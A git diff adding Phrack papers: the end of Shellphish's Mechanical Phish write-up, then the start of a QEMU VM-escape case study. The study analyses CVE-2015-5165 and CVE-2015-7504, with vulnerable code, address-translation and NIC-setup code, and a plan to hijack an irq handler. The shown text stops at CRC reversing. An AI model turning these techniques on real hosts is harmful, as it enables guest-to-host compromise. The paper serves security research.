+ +Our Type-2 exploit approach, which uses an embedded constraint solver to +recover flag data, is available at +https://github.com/mechaphish/colorguard. + +* MultiAFL. + +We created a port of AFL that supports analyzing multi-CB challenge sets. +It is available at https://github.com/mechaphish/multiafl. + +* Simulator. + +To help plan our strategy, we wrote a simulation of the CGC. It is +available at https://github.com/mechaphish/simulator. + +* POV Fuzzing. + +In addition to Rex, we used a backup strategy of "POV Fuzzing", where a +crashing input would be fuzzed to determine relationships that could be +used to create a POV. These fuzzers are available at +https://github.com/mechaphish/pov_fuzzing. + +* QEMU CGC port. + +We ported QEMU to work on DECREE binaries. This port is available at +https://github.com/mechaphish/qemu-cgc. + + + +--[ 009 - Looking Forward + +Shellphish is a dynamic team, and we are always looking for the next +challenge. What is next? Even we might not know, but we can speculate in +this section! + + +* Limitations of the Mechanical Phish + +The Mechanical Phish is a glorified research prototype, and significant +engineering work is needed to bring it to a point where it is usable in the +real world. Mostly, this takes the form of implementing the environment +model of operating systems other than DECREE. For example, the Mechanical +Phish can currently analyze, exploit, and patch Linux binaries, but only if +they stick to a very limited number of system calls. + +We open-sourced the Mechanical Phish in the hopes that work like this can +live on after the CGC, and it is our sincere hope that the CRS continues to +evolve. + + +* Cyber Grand Challenge 2? + +As soon as the Cyber Grand Challenge ended, there were discussions about +whether or not there would be a CGC2. 
Generally, DARPA tries to push
+fundamental advances: they did the self-driving Grand Challenge more than
+once, but this seems to be because no teams won it the first time. The
+fact that they have not done a self-driving Grand Challenge since implies
+that DARPA is not in the business of running these huge competitions just
+for the heck of it: they are trying to push research forward.
+
+In that sense, it would surprise us if there was a CGC2, on DECREE OS, with
+the same format as it exists now. For such a game to happen, the community
+would probably have to organize it themselves. With the reduced barrier to
+entry (in the form of an open-sourced Mechanical Phish), such a competition
+could be pretty interesting. Maybe after some more post-CGC recovery, we'll
+look into it!
+
+Of course, we can also sit back and see what ground-breaking concept DARPA
+comes up with for another Grand Challenge. Maybe there'll be hacking in
+that one as well.
+
+
+* Shellphish Projects
+
+The Mechanical Phish and angr are not Shellphish's only endeavors. We are
+also very active in CTFs, and one thing to come out of this is the
+development of various resources to help newbies to CTF. For example, we
+have put together a "toolset" bundle to help get people started in security
+with common security tools (github.com/zardus/ctf-tools), and, in the
+middle of the CGC insanity, ran a series of hack meetings in the university
+to teach people, by example, how to perform heap meta-data attacks
+(github.com/shellphish/how2heap). We're continuing down that road, in fact.
+Monitor our github for our next big thing! 
+
+
+--[ 010 - References
+
+[Driller16] Driller: Augmenting Fuzzing Through Selective Symbolic
+Execution
+Nick Stephens, John Grosen, Christopher Salls, Andrew Dutcher, Ruoyu Wang,
+Jacopo Corbetta, Yan Shoshitaishvili, Christopher Kruegel, Giovanni Vigna
+Proceedings of the Network and Distributed System Security Symposium (NDSS)
+San Diego, CA February 2016
+
+[ArtOfWar16] (State of) The Art of War: Offensive Techniques in Binary
+Analysis
+Yan Shoshitaishvili, Ruoyu Wang, Christopher Salls, Nick Stephens, Mario
+Polino, Andrew Dutcher, John Grosen, Siji Feng, Christophe Hauser,
+Christopher Kruegel, Giovanni Vigna
+Proceedings of the IEEE Symposium on Security and Privacy San Jose, CA May
+2016
+
+[Ramblr17] Ramblr: Making Reassembly Great Again
+Ruoyu Wang, Yan Shoshitaishvili, Antonio Bianchi, Aravind Machiry, John
+Grosen, Paul Grosen, Christopher Kruegel, Giovanni Vigna
+Proceedings of the Network and Distributed System Security Symposium (NDSS)
+San Diego, CA February 2017
+
+[angr] http://angr.io
+
+[Inversion] https://en.wikipedia.org/wiki/Sleep_inversion
+
+[CGCFAQ] https://cgc.darpa.mil/CGC_FAQ.pdf
diff --git a/phrack/papers/VM_escape.txt b/phrack/papers/VM_escape.txt
new file mode 100644
index 0000000..8797095
--- /dev/null
+++ b/phrack/papers/VM_escape.txt
@@ -0,0 +1,1784 @@
+|=-----------------------------------------------------------------------=|
+|=----------------------------=[ VM escape ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ QEMU Case Study ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------------------=[ Mehdi Talbi ]=---------------------------=|
+|=--------------------------=[ Paul Fariello ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+--[ Table of contents
+
+ 1 - Introduction
+ 2 - KVM/QEMU 
Overview
+   2.1 - Workspace Environment
+   2.2 - QEMU Memory Layout
+   2.3 - Address Translation
+ 3 - Memory Leak Exploitation
+   3.1 - The Vulnerable Code
+   3.2 - Setting up the Card
+   3.3 - Exploit
+ 4 - Heap-based Overflow Exploitation
+   4.1 - The Vulnerable Code
+   4.2 - Setting up the Card
+   4.3 - Reversing CRC
+   4.4 - Exploit
+ 5 - Putting All Together
+   5.1 - RIP Control
+   5.2 - Interactive Shell
+   5.3 - VM-Escape Exploit
+   5.4 - Limitations
+
+ 6 - Conclusions
+ 7 - Greets
+ 8 - References
+ 9 - Source Code
+
+--[ 1 - Introduction
+
+Virtual machines are nowadays heavily deployed for personal use or within
+the enterprise segment. Network security vendors, for instance, use
+different VMs to analyze malware in a controlled and confined environment.
+A natural question arises: can the malware escape from the VM and execute
+code on the host machine?
+
+Last year, Jason Geffner from CrowdStrike reported a serious bug in QEMU
+affecting the virtual floppy drive code that could allow an attacker to
+escape from the VM [1] to the host. Even though this vulnerability has
+received considerable attention in the netsec community - probably because
+it has a dedicated name (VENOM) - it wasn't the first of its kind.
+
+In 2011, Nelson Elhage [2] reported and successfully exploited a
+vulnerability in QEMU's emulation of PCI device hotplugging. The exploit is
+available at [3].
+
+Recently, Xu Liu and Shengping Wang, from Qihoo 360, showcased at HITB 2016
+a successful exploit on KVM/QEMU. They exploited two vulnerabilities
+(CVE-2015-5165 and CVE-2015-7504) present in two different network card
+device emulator models, namely, RTL8139 and PCNET. During their
+presentation, they outlined the main steps towards code execution on the
+host machine but provided neither an exploit nor the technical details to
+reproduce it. 
+
+In this paper, we provide an in-depth analysis of CVE-2015-5165 (a
+memory-leak vulnerability) and CVE-2015-7504 (a heap-based overflow
+vulnerability), along with working exploits. The combination of these two
+exploits makes it possible to break out of a VM and execute code on the
+target host. We discuss the technical details required to exploit the
+vulnerabilities in QEMU's network card device emulation, and provide
+generic techniques that could be re-used to exploit future bugs in QEMU.
+For instance, an interactive bindshell that leverages shared memory areas
+and shared code.
+
+--[ 2 - KVM/QEMU Overview
+
+KVM (Kernel-based Virtual Machine) is a kernel module that provides full
+virtualization infrastructure for user space programs. It allows one to run
+multiple virtual machines running unmodified Linux or Windows images.
+
+The user space component of KVM is included in mainline QEMU (Quick
+Emulator), which notably handles device emulation.
+
+----[ 2.1 - Workspace Environment
+
+In an effort to make things easier for those who want to use the sample
+code given throughout this paper, we provide here the main steps to
+reproduce our development environment.
+
+Since the vulnerabilities we are targeting have already been patched, we
+need to check out the QEMU source repository and switch to the commit
+that precedes the fix for these vulnerabilities. Then, we configure QEMU
+for the x86_64 target only and enable debugging:
+
+    $ git clone git://git.qemu-project.org/qemu.git
+    $ cd qemu
+    $ git checkout bd80b59
+    $ mkdir -p bin/debug/native
+    $ cd bin/debug/native
+    $ ../../../configure --target-list=x86_64-softmmu --enable-debug \
+    $   --disable-werror
+    $ make
+
+In our testing environment, we build QEMU using GCC 4.9.2. 
+
+For the rest, we assume that the reader already has a Linux x86_64 image
+that can be run with the following command line:
+
+    $ ./qemu-system-x86_64 -enable-kvm -m 2048 -display vnc=:89 \
+    $   -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 \
+    $   -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1 \
+    $   -drive file=<image>,format=qcow2,if=ide,cache=writeback
+
+We allocate 2 GB of memory and create two network interface cards: RTL8139
+and PCNET.
+
+We are running QEMU on a Debian 7 machine with a 3.16 kernel on the x86_64
+architecture.
+
+----[ 2.2 - QEMU Memory Layout
+
+The physical memory allocated for the guest is actually an mmap'ed private
+region in the virtual address space of QEMU. It's important to note that
+the PROT_EXEC flag is not enabled while allocating the physical memory of
+the guest.
+
+The following figure illustrates how the guest's memory and the host's
+memory cohabit.
+
+                     Guest's processes
+                    +--------------------+
+Virtual addr space  |                    |
+                    +--------------------+
+                    |                    |
+                     \__ Page Table \__
+                        \             \
+                         |             |  Guest kernel
+                    +----+--------------------+----------------+
+Guest's phy. memory |    |                    |                |
+                    +----+--------------------+----------------+
+                         |                    |
+                          \__                  \__
+                             \                    \
+                              |   QEMU process     |
+                         +----+------------------------------------------+
+Virtual addr space       |    |                                          |
+                         +----+------------------------------------------+
+                              |                                          |
+                               \__ Page Table \__
+                                  \              \
+                                   |              |
+                         +----+-----------------------------------------------++
+Physical memory          |    |                                               ||
+                         +----+-----------------------------------------------++
+
+Additionally, QEMU reserves a memory region for the BIOS and ROM. These
+mappings are available in QEMU's maps file:
+
+7f1824ecf000-7f1828000000 rw-p 00000000 00:00 0
+7f1828000000-7f18a8000000 rw-p 00000000 00:00 0          [2 GB of RAM]
+7f18a8000000-7f18a8992000 rw-p 00000000 00:00 0
+7f18a8992000-7f18ac000000 ---p 00000000 00:00 0
+7f18b5016000-7f18b501d000 r-xp 00000000 fd:00 262489     [first shared lib]
+7f18b501d000-7f18b521c000 ---p 00007000 fd:00 262489     ... 
+7f18b521c000-7f18b521d000 r--p 00006000 fd:00 262489     ...
+7f18b521d000-7f18b521e000 rw-p 00007000 fd:00 262489     ...
+
+    ... [more shared libs]
+
+7f18bc01c000-7f18bc5f4000 r-xp 00000000 fd:01 30022647   [qemu-system-x86_64]
+7f18bc7f3000-7f18bc8c1000 r--p 005d7000 fd:01 30022647   ...
+7f18bc8c1000-7f18bc943000 rw-p 006a5000 fd:01 30022647   ...
+
+7f18bd328000-7f18becdd000 rw-p 00000000 00:00 0          [heap]
+7ffded947000-7ffded968000 rw-p 00000000 00:00 0          [stack]
+7ffded968000-7ffded96a000 r-xp 00000000 00:00 0          [vdso]
+7ffded96a000-7ffded96c000 r--p 00000000 00:00 0          [vvar]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0  [vsyscall]
+
+A more detailed explanation of memory management in virtualized
+environments can be found at [4].
+
+----[ 2.3 - Address Translation
+
+Within QEMU there exist two translation layers:
+
+- From a guest virtual address to a guest physical address. In our
+  exploit, we need to configure network card devices that require DMA
+  access. For example, we need to provide the physical address of the
+  Tx/Rx buffers to correctly configure the network card devices.
+
+- From a guest physical address to QEMU's virtual address space. In our
+  exploit, we need to inject fake structures and get their precise
+  address in QEMU's virtual address space.
+
+On x64 systems, a virtual address is made of a page offset (bits 0-11)
+and a page number. On Linux systems, the pagemap file enables userspace
+processes with CAP_SYS_ADMIN privileges to find out which physical frame
+each virtual page is mapped to. The pagemap file contains, for each
+virtual page, a 64-bit value documented at kernel.org [5]:
+
+- Bits 0-54  : physical frame number if present.
+- Bit  55    : page table entry is soft-dirty.
+- Bit  56    : page exclusively mapped.
+- Bits 57-60 : zero
+- Bit  61    : page is file-page or shared-anon.
+- Bit  62    : page is swapped.
+- Bit  63    : page is present.
+
+To convert a virtual address to a physical one, we rely on Nelson Elhage's
+code [3]. 
The following program allocates a buffer, fills it with the
+string "Where am I?" and prints its physical address:
+
+---[ mmu.c ]---
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <inttypes.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <assert.h>
+
+#define PAGE_SHIFT  12
+#define PAGE_SIZE   (1 << PAGE_SHIFT)
+#define PFN_PRESENT (1ull << 63)
+#define PFN_PFN     ((1ull << 55) - 1)
+
+int fd;
+
+uint32_t page_offset(uint32_t addr)
+{
+    return addr & ((1 << PAGE_SHIFT) - 1);
+}
+
+uint64_t gva_to_gfn(void *addr)
+{
+    uint64_t pme, gfn;
+    size_t offset;
+    offset = ((uintptr_t)addr >> 9) & ~7;
+    lseek(fd, offset, SEEK_SET);
+    read(fd, &pme, 8);
+    if (!(pme & PFN_PRESENT))
+        return -1;
+    gfn = pme & PFN_PFN;
+    return gfn;
+}
+
+uint64_t gva_to_gpa(void *addr)
+{
+    uint64_t gfn = gva_to_gfn(addr);
+    assert(gfn != -1);
+    return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
+}
+
+int main()
+{
+    uint8_t *ptr;
+    uint64_t ptr_mem;
+
+    fd = open("/proc/self/pagemap", O_RDONLY);
+    if (fd < 0) {
+        perror("open");
+        exit(1);
+    }
+
+    ptr = malloc(256);
+    strcpy(ptr, "Where am I?");
+    printf("%s\n", ptr);
+    ptr_mem = gva_to_gpa(ptr);
+    printf("Your physical address is at 0x%"PRIx64"\n", ptr_mem);
+
+    getchar();
+    return 0;
+}
+
+If we run the above code inside the guest and attach gdb to the QEMU
+process, we can see that our buffer is located within the physical address
+space allocated for the guest. More precisely, we note that the printed
+address is actually an offset from the base address of the guest physical
+memory:
+
+root@debian:~# ./mmu
+Where am I?
+Your physical address is at 0x78b0d010
+
+(gdb) info proc mappings
+process 14791
+Mapped address spaces:
+
+     Start Addr           End Addr       Size     Offset objfile
+  0x7fc314000000     0x7fc314022000    0x22000        0x0
+  0x7fc314022000     0x7fc318000000  0x3fde000        0x0
+  0x7fc319dde000     0x7fc31c000000  0x2222000        0x0
+  0x7fc31c000000     0x7fc39c000000 0x80000000        0x0
+  ...
+
+(gdb) x/s 0x7fc31c000000 + 0x78b0d010
+0x7fc394b0d010:  "Where am I?" 
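The second translation layer - from a guest physical address to a host virtual address inside QEMU - then boils down to a single addition, since guest RAM is one contiguous mmap'ed region. A minimal sketch (the names `hptr_t`, `qemu_phy_mem_base` and `gpa_to_hva` are ours, not QEMU's; the base address is the value recovered from the memory leak described in section 3):

```c
#include <stdint.h>

typedef uint64_t hptr_t;        /* host (QEMU) virtual address */

/* Base of the guest RAM mapping inside QEMU's address space; in the
 * real exploit this value is recovered from the memory leak. */
hptr_t qemu_phy_mem_base;

/* Guest RAM is a single contiguous mmap'ed region, so translating a
 * guest physical address is just an offset addition. */
hptr_t gpa_to_hva(uint64_t gpa)
{
    return qemu_phy_mem_base + gpa;
}
```

With the maps file shown in section 2.2 (guest RAM starting at 0x7f1828000000), the buffer at guest physical address 0x78b0d010 would live at 0x7f18a0b0d010 in QEMU's address space.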
+
+--[ 3 - Memory Leak Exploitation
+
+In the following, we will exploit CVE-2015-5165 - a memory leak
+vulnerability that affects the RTL8139 network card device emulator - in
+order to reconstruct the memory layout of QEMU. More precisely, we need to
+leak (i) the base address of the .text segment in order to build our
+shellcode and (ii) the base address of the physical memory allocated for
+the guest in order to be able to get the precise address of some injected
+dummy structures.
+
+----[ 3.1 - The Vulnerable Code
+
+The REALTEK network card supports two receive/transmit operation modes: C
+mode and C+ mode. When the card is set up to use C+ mode, the NIC device
+emulator miscalculates the length of the IP packet data and ends up
+sending more data than actually available in the packet.
+
+The vulnerability is present in the rtl8139_cplus_transmit_one function
+from hw/net/rtl8139.c:
+
+/* ip packet header */
+ip_header *ip = NULL;
+int hlen = 0;
+uint8_t ip_protocol = 0;
+uint16_t ip_data_len = 0;
+
+uint8_t *eth_payload_data = NULL;
+size_t eth_payload_len = 0;
+
+int proto = be16_to_cpu(*(uint16_t *)(saved_buffer + 12));
+if (proto == ETH_P_IP)
+{
+    DPRINTF("+++ C+ mode has IP packet\n");
+
+    /* not aligned */
+    eth_payload_data = saved_buffer + ETH_HLEN;
+    eth_payload_len = saved_size - ETH_HLEN;
+
+    ip = (ip_header*)eth_payload_data;
+
+    if (IP_HEADER_VERSION(ip) != IP_HEADER_VERSION_4) {
+        DPRINTF("+++ C+ mode packet has bad IP version %d "
+            "expected %d\n", IP_HEADER_VERSION(ip),
+            IP_HEADER_VERSION_4);
+        ip = NULL;
+    } else {
+        hlen = IP_HEADER_LENGTH(ip);
+        ip_protocol = ip->ip_p;
+        ip_data_len = be16_to_cpu(ip->ip_len) - hlen;
+    }
+}
+
+The IP header contains two fields hlen and ip->ip_len that represent the
+length of the IP header (20 bytes considering a packet without options) and
+the total length of the packet including the IP header, respectively. 
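Since ip_data_len (last line of the snippet above) is an unsigned short computed without any sanity check, a too-small ip->ip_len wraps around. The arithmetic can be reproduced in isolation (a standalone sketch of our own, not QEMU code):

```c
#include <stdint.h>

/* Mirrors the computation in rtl8139_cplus_transmit_one(): the
 * subtraction is performed without checking that ip_len >= hlen and
 * the result is stored in a 16-bit unsigned variable. */
uint16_t compute_ip_data_len(uint16_t ip_len, int hlen)
{
    return (uint16_t)(ip_len - hlen);
}
```

With ip->ip_len set to hlen - 1, the device emulator therefore believes it has almost 64 KB of payload to transmit.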
As
+shown at the end of the snippet of code given above, there is no check to
+ensure that ip->ip_len >= hlen while computing the length of the IP data
+(ip_data_len). As ip_data_len is encoded as an unsigned short, this leads
+to sending more data than actually available in the transmit buffer.
+
+More precisely, ip_data_len is later used to compute the length of the TCP
+data that is copied - chunk by chunk if the data exceeds the size of the
+MTU - into a malloc'ed buffer:
+
+int tcp_data_len = ip_data_len - tcp_hlen;
+int tcp_chunk_size = ETH_MTU - hlen - tcp_hlen;
+
+int is_last_frame = 0;
+
+for (tcp_send_offset = 0; tcp_send_offset < tcp_data_len;
+     tcp_send_offset += tcp_chunk_size) {
+    uint16_t chunk_size = tcp_chunk_size;
+
+    /* check if this is the last frame */
+    if (tcp_send_offset + tcp_chunk_size >= tcp_data_len) {
+        is_last_frame = 1;
+        chunk_size = tcp_data_len - tcp_send_offset;
+    }
+
+    memcpy(data_to_checksum, saved_ip_header + 12, 8);
+
+    if (tcp_send_offset) {
+        memcpy((uint8_t*)p_tcp_hdr + tcp_hlen,
+               (uint8_t*)p_tcp_hdr + tcp_hlen + tcp_send_offset,
+               chunk_size);
+    }
+
+    /* more code follows */
+}
+
+So, if we forge a malformed packet with a corrupted length field (e.g.
+ip->ip_len = hlen - 1), then we can leak approximately 64 KB from QEMU's
+heap memory. Instead of sending a single packet, the network card device
+emulator will end up sending 43 fragmented packets.
+
+----[ 3.2 - Setting up the Card
+
+In order to send our malformed packet and read the leaked data, we first
+need to configure Rx and Tx descriptor buffers on the card, and set up
+some flags so that our packet flows through the vulnerable code path.
+
+The figure below shows the RTL8139 registers. 
We will not detail all of
+them but only those which are relevant to our exploit:
+
+      +---------------------------+----------------------------+
+ 0x00 |           MAC0            |            MAR0            |
+      +---------------------------+----------------------------+
+ 0x10 |                       TxStatus0                        |
+      +--------------------------------------------------------+
+ 0x20 |                        TxAddr0                         |
+      +-------------------+-------+----------------------------+
+ 0x30 |       RxBuf       |ChipCmd|                            |
+      +-------------+------+------+----------------------------+
+ 0x40 |  TxConfig   |  RxConfig   |            ...             |
+      +-------------+-------------+----------------------------+
+      |                                                        |
+      |             skipping irrelevant registers              |
+      |                                                        |
+      +---------------------------+--+------+------------------+
+ 0xd0 |            ...            |  |TxPoll|       ...        |
+      +-------+------+------------+--+------+--+---------------+
+ 0xe0 | CpCmd | ...  |RxRingAddrLO|RxRingAddrHI|      ...      |
+      +-------+------+------------+------------+---------------+
+
+- TxConfig: Enable/disable Tx flags such as TxLoopBack (enable loopback
+  test mode), TxCRC (do not append CRC to Tx packets), etc.
+- RxConfig: Enable/disable Rx flags such as AcceptBroadcast (accept
+  broadcast packets), AcceptMulticast (accept multicast packets), etc.
+- CpCmd: C+ command register used to enable some functions such as
+  CPlusRxEnb (enable receive) and CPlusTxEnb (enable transmit).
+- TxAddr0: Physical memory address of the Tx descriptors table.
+- RxRingAddrLO: Low 32 bits of the physical memory address of the Rx
+  descriptors table.
+- RxRingAddrHI: High 32 bits of the physical memory address of the Rx
+  descriptors table.
+- TxPoll: Tell the card to check the Tx descriptors.
+
+An Rx/Tx descriptor is defined by the following structure, where buf_lo
+and buf_hi are the low and high 32 bits of the physical memory address of
+the Tx/Rx buffers, respectively. These addresses point to buffers holding
+the packets to be sent/received and must be aligned on a page-size
+boundary. 
The variable
+dw0 encodes the size of the buffer, plus additional flags such as the
+ownership flag that denotes whether the buffer is owned by the card or by
+the driver.
+
+struct rtl8139_desc {
+    uint32_t dw0;
+    uint32_t dw1;
+    uint32_t buf_lo;
+    uint32_t buf_hi;
+};
+
+The network card is configured through the in*()/out*() primitives (from
+sys/io.h). We need to have CAP_SYS_RAWIO privileges to do so. The
+following snippet of code configures the card and sets up a single Tx
+descriptor:
+
+#define RTL8139_PORT        0xc000
+#define RTL8139_BUFFER_SIZE 1500
+
+struct rtl8139_desc desc;
+void *rtl8139_tx_buffer;
+uint32_t phy_mem;
+
+rtl8139_tx_buffer = aligned_alloc(PAGE_SIZE, RTL8139_BUFFER_SIZE);
+phy_mem = (uint32_t)gva_to_gpa(rtl8139_tx_buffer);
+
+memset(&desc, 0, sizeof(struct rtl8139_desc));
+
+desc.dw0 |= CP_TX_OWN | CP_TX_EOR | CP_TX_LS | CP_TX_LGSEN |
+            CP_TX_IPCS | CP_TX_TCPCS;
+desc.dw0 += RTL8139_BUFFER_SIZE;
+
+desc.buf_lo = phy_mem;
+
+iopl(3);
+
+outl(TxLoopBack, RTL8139_PORT + TxConfig);
+outl(AcceptMyPhys, RTL8139_PORT + RxConfig);
+
+outw(CPlusRxEnb|CPlusTxEnb, RTL8139_PORT + CpCmd);
+outb(CmdRxEnb|CmdTxEnb, RTL8139_PORT + ChipCmd);
+
+outl(phy_mem, RTL8139_PORT + TxAddr0);
+outl(0x0, RTL8139_PORT + TxAddr0 + 0x4);
+
+----[ 3.3 - Exploit
+
+The full exploit (cve-2015-5165.c) is available inside the attached source
+code tarball. The exploit configures the required registers on the card
+and sets up Tx and Rx buffer descriptors. Then it forges a malformed IP
+packet addressed to the MAC address of the card. This enables us to read
+the leaked data by accessing the configured Rx buffers.
+
+While analyzing the leaked data we have observed that several function
+pointers are present. 
A closer look reveals that these function
+pointers are all members of the same QEMU internal structure:
+
+typedef struct ObjectProperty
+{
+    gchar *name;
+    gchar *type;
+    gchar *description;
+    ObjectPropertyAccessor *get;
+    ObjectPropertyAccessor *set;
+    ObjectPropertyResolve *resolve;
+    ObjectPropertyRelease *release;
+    void *opaque;
+
+    QTAILQ_ENTRY(ObjectProperty) node;
+} ObjectProperty;
+
+QEMU follows an object model to manage devices, memory regions, etc. At
+startup, QEMU creates several objects and assigns properties to them. For
+example, the following call adds a "may-overlap" property to a memory
+region object. This property is endowed with a getter method to retrieve
+the value of this boolean property:
+
+object_property_add_bool(OBJECT(mr), "may-overlap",
+                         memory_region_get_may_overlap,
+                         NULL, /* memory_region_set_may_overlap */
+                         &error_abort);
+
+The RTL8139 network card device emulator reserves a 64 KB buffer on the
+heap to reassemble packets. There is a good chance that this allocated
+buffer fits in the space left free by destroyed object properties.
+
+In our exploit, we search for known object properties in the leaked
+memory. More precisely, we are looking for 80-byte memory chunks (the
+chunk size of a freed ObjectProperty structure) where at least one of the
+function pointers is set (get, set, resolve or release). Even if these
+addresses are subject to ASLR, we can still guess the base address of the
+.text section. Indeed, their page offsets are fixed (the 12 least
+significant bits of virtual addresses are not randomized). We can do some
+arithmetic to get the addresses of some of QEMU's useful functions. We can
+also derive the addresses of some libc functions such as mprotect() and
+system() from their PLT entries.
+
+We have also noticed that the address PHY_MEM + 0x78 is leaked several
+times, where PHY_MEM is the start address of the physical memory allocated
+for the guest. 
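The scan itself only has to recognize plausible code pointers. Since ASLR leaves the low 12 bits of an address untouched, a leaked pointer can be matched against the known page offset of a target function, and the randomized base then falls out by subtraction. A hedged sketch (the helper names and the symbol offset used in the test are ours/hypothetical, not taken from the exploit):

```c
#include <stdint.h>

/* A candidate code pointer must lie in a plausible x86_64 userland
 * range and keep the page offset of the known target function, since
 * ASLR does not randomize the low 12 bits. */
int looks_like_text_ptr(uint64_t ptr, uint64_t page_offset)
{
    if (ptr < 0x400000ull || ptr >= 0x800000000000ull)
        return 0;
    return (ptr & 0xfffull) == page_offset;
}

/* Once a leaked pointer is identified, the randomized .text base is
 * the pointer minus the symbol's fixed offset inside the binary. */
uint64_t text_base_from_leak(uint64_t leaked_ptr, uint64_t sym_offset)
{
    return leaked_ptr - sym_offset;
}
```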
+
+The current exploit searches the leaked memory and tries to resolve (i)
+the base address of the .text segment and (ii) the base address of the
+physical memory.
+
+--[ 4 - Heap-based Overflow Exploitation
+
+This section discusses the vulnerability CVE-2015-7504 and provides an
+exploit that gets control over the %rip register.
+
+----[ 4.1 - The Vulnerable Code
+
+The AMD PCNET network card emulator is vulnerable to a heap-based overflow
+when large-size packets are received in loopback test mode. The PCNET
+device emulator reserves a 4 kB buffer to store packets. If the ADDFCS
+flag is enabled on the Tx descriptor, the card appends a CRC to received
+packets, as shown in the following snippet of code from the
+pcnet_receive() function in hw/net/pcnet.c. This does not pose a problem
+if the size of the received packet is less than 4096 - 4 bytes. However,
+if the packet has exactly 4096 bytes, then we can overflow the destination
+buffer by 4 bytes.
+
+uint8_t *src = s->buffer;
+
+/* ... 
*/
+
+if (!s->looptest) {
+    memcpy(src, buf, size);
+    /* no need to compute the CRC */
+    src[size] = 0;
+    src[size + 1] = 0;
+    src[size + 2] = 0;
+    src[size + 3] = 0;
+    size += 4;
+} else if (s->looptest == PCNET_LOOPTEST_CRC ||
+           !CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
+    uint32_t fcs = ~0;
+    uint8_t *p = src;
+
+    while (p != &src[size])
+        CRC(fcs, *p++);
+    *(uint32_t *)p = htonl(fcs);
+    size += 4;
+}
+
+In the above code, s points to the PCNET main structure, where we can see
+that beyond our vulnerable buffer, we can corrupt the value of the irq
+variable:
+
+struct PCNetState_st {
+    NICState *nic;
+    NICConf conf;
+    QEMUTimer *poll_timer;
+    int rap, isr, lnkst;
+    uint32_t rdra, tdra;
+    uint8_t prom[16];
+    uint16_t csr[128];
+    uint16_t bcr[32];
+    int xmit_pos;
+    uint64_t timer;
+    MemoryRegion mmio;
+    uint8_t buffer[4096];
+    qemu_irq irq;
+    void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
+                          uint8_t *buf, int len, int do_bswap);
+    void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
+                           uint8_t *buf, int len, int do_bswap);
+    void *dma_opaque;
+    int tx_busy;
+    int looptest;
+};
+
+The variable irq is a pointer to an IRQState structure that represents a
+handler to execute:
+
+typedef void (*qemu_irq_handler)(void *opaque, int n, int level);
+
+struct IRQState {
+    Object parent_obj;
+    qemu_irq_handler handler;
+    void *opaque;
+    int n;
+};
+
+This handler is called several times by the PCNET card emulator. For
+instance, at the end of the pcnet_receive() function, there is a call to
+pcnet_update_irq(), which in turn calls qemu_set_irq():
+
+void qemu_set_irq(qemu_irq irq, int level)
+{
+    if (!irq)
+        return;
+
+    irq->handler(irq->opaque, irq->n, level);
+}
+
+So, what we need to exploit this vulnerability:
+
+- allocate a fake IRQState structure with a handler to execute (e.g.
+  system()).
+
+- compute the precise address of this allocated fake structure. 
Thanks to
+  the previous memory leak, we know exactly where our fake structure
+  resides in QEMU's process memory (at some offset from the base address
+  of the guest's physical memory).
+
+- forge a 4 kB malicious packet.
+
+- patch the packet so that the computed CRC on that packet matches the
+  address of our fake IRQState structure.
+
+- send the packet.
+
+When this packet is received by the PCNET card, it is handled by the
+pcnet_receive() function, which performs the following actions:
+
+- copies the content of the received packet into the buffer variable.
+- computes a CRC and appends it to the buffer. The buffer is overflowed
+  by 4 bytes and the value of the irq variable is corrupted.
+- calls pcnet_update_irq(), which in turn calls qemu_set_irq() with the
+  corrupted irq variable. Our handler is then executed.
+
+Note that we can get control over the first two parameters of the
+substituted handler (irq->opaque and irq->n), but thanks to a little trick
+that we will see later, we can get control over the third parameter too
+(the level parameter). This will be necessary to call the mprotect()
+function.
+
+Note also that we corrupt an 8-byte pointer with 4 bytes. This is
+sufficient in our testing environment to successfully get control over
+the %rip register. However, this poses a problem with kernels compiled
+without the CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE flag. This issue is
+discussed in section 5.4.
+
+----[ 4.2 - Setting up the Card
+
+Before going further, we need to set up the PCNET card in order to
+configure the required flags, set up Tx and Rx descriptor buffers, and
+allocate ring buffers to hold the packets to transmit and receive.
+
+The AMD PCNET card can be accessed in 16-bit mode or 32-bit mode. This
+depends on the current value of DWIO (a value stored in the card). 
In the
+following, we detail the main registers of the PCNET card in 16-bit
+access mode, as this is the default mode after a card reset:
+
+     0                                16
+     +----------------------------------+
+     |              EPROM               |
+     +----------------------------------+
+     |      RDP - Data reg for CSR      |
+     +----------------------------------+
+     | RAP - Index reg for CSR and BCR  |
+     +----------------------------------+
+     |            Reset reg             |
+     +----------------------------------+
+     |      BDP - Data reg for BCR      |
+     +----------------------------------+
+
+
+The card can be reset to its defaults by accessing the reset register.
+
+The card has two types of internal registers: CSR (Control and Status
+Register) and BCR (Bus Control Registers). Both registers are accessed by
+first setting the index of the register that we want to access in the RAP
+(Register Address Port) register. For instance, if we want to init and
+restart the card, we need to set bits 0 and 1 of register CSR0 to 1. This
+can be done by writing 0 to the RAP register in order to select the
+register CSR0, then by setting register CSR0 to 0x3:
+
+outw(0x0, PCNET_PORT + RAP);
+outw(0x3, PCNET_PORT + RDP);
+
+The configuration of the card can be done by filling an initialization
+structure and passing the physical address of this structure to the card
+(through registers CSR1 and CSR2):
+
+struct pcnet_config {
+    uint16_t mode;      /* working mode: promiscuous, looptest, etc. */
+    uint8_t  rlen;      /* number of rx descriptors in log2 base */
+    uint8_t  tlen;      /* number of tx descriptors in log2 base */
+    uint8_t  mac[6];    /* mac address */
+    uint16_t _reserved;
+    uint8_t  ladr[8];   /* logical address filter */
+    uint32_t rx_desc;   /* physical address of rx descriptor buffer */
+    uint32_t tx_desc;   /* physical address of tx descriptor buffer */
+};
+
+----[ 4.3 - Reversing CRC
+
+As discussed previously, we need to fill a packet with data in such a way
+that the computed CRC matches the address of our fake structure.
+Fortunately, the CRC is reversible. 
